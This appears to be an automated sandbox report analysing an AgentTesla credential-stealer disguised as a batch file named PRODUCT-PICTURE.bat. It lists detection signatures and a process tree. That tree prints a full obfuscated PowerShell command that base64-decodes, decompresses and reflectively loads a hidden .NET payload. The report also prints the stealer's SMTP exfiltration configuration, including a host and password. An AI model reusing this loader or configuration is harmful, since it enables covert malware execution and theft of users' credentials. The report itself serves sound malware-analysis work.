Windows
Analysis Report
PRODUCT-PICTURE.bat
Overview
General Information
Detection
AgentTesla
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found large BAT file
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PRODUCT-PICTURE.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chcp.com (PID: 7392 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  - cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - xcopy.exe (PID: 7416 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\PRODUCT-PICTURE.bat.Usq MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
  - attrib.exe (PID: 7444 cmdline: attrib +s +h C:\Users\user\Desktop\PRODUCT-PICTURE.bat.Usq MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  - PRODUCT-PICTURE.bat.Usq (PID: 7460 cmdline: C:\Users\user\Desktop\PRODUCT-PICTURE.bat.Usq -WindowStyle hidden -command "$Gcbnyd = get-content 'C:\Users\user\Desktop\PRODUCT-PICTURE.bat' | Select-Object -Last 1; $Wbqkngq = [System.Convert]::FromBase64String($Gcbnyd);$Wwtukg = New-Object System.IO.MemoryStream( , $Wbqkngq );$Dsvtbpwioop = New-Object System.IO.MemoryStream;$Aslrlsosng = New-Object System.IO.Compression.GzipStream $Wwtukg, ([IO.Compression.CompressionMode]::Decompress);$Aslrlsosng.CopyTo( $Dsvtbpwioop );$Aslrlsosng.Close();$Wwtukg.Close();[byte[]] $Wbqkngq = $Dsvtbpwioop.ToArray();[Array]::Reverse($Wbqkngq); $Fmbtk = [System.AppDomain]::CurrentDomain.Load($Wbqkngq); $Gxbkjncruwk = $Fmbtk.EntryPoint; $Gxbkjncruwk.DeclaringType.InvokeMember($Gxbkjncruwk.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - InstallUtil.exe (PID: 7580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- wscript.exe (PID: 7768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\IV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chcp.com (PID: 7860 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  - cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - xcopy.exe (PID: 7888 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\IV.bat.Usq MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
  - attrib.exe (PID: 7912 cmdline: attrib +s +h C:\Users\user\AppData\Roaming\IV.bat.Usq MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  - IV.bat.Usq (PID: 7928 cmdline: C:\Users\user\AppData\Roaming\IV.bat.Usq -WindowStyle hidden -command "$Gcbnyd = get-content 'C:\Users\user\AppData\Roaming\IV.bat' | Select-Object -Last 1; $Wbqkngq = [System.Convert]::FromBase64String($Gcbnyd);$Wwtukg = New-Object System.IO.MemoryStream( , $Wbqkngq );$Dsvtbpwioop = New-Object System.IO.MemoryStream;$Aslrlsosng = New-Object System.IO.Compression.GzipStream $Wwtukg, ([IO.Compression.CompressionMode]::Decompress);$Aslrlsosng.CopyTo( $Dsvtbpwioop );$Aslrlsosng.Close();$Wwtukg.Close();[byte[]] $Wbqkngq = $Dsvtbpwioop.ToArray();[Array]::Reverse($Wbqkngq); $Fmbtk = [System.AppDomain]::CurrentDomain.Load($Wbqkngq); $Gxbkjncruwk = $Fmbtk.EntryPoint; $Gxbkjncruwk.DeclaringType.InvokeMember($Gxbkjncruwk.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - InstallUtil.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |